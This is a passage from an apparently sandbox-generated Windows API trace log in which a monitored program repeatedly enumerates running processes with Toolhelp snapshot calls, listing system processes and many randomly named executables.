pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.705] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.708] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0145.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0145.724] CloseHandle (hObject=0xbc) returned 1 [0145.724] Sleep (dwMilliseconds=0x12c) [0146.220] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.226] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.230] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.240] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.240] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0146.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.250] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0146.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0146.255] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0146.257] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0146.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0146.369] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0146.371] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0146.373] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0146.374] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0146.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0146.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0146.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0146.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0146.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0146.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0146.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0146.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0146.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0146.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0146.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0146.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0146.397] CloseHandle (hObject=0xc4) returned 1 [0146.397] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.404] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0146.517] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.518] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.523] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, 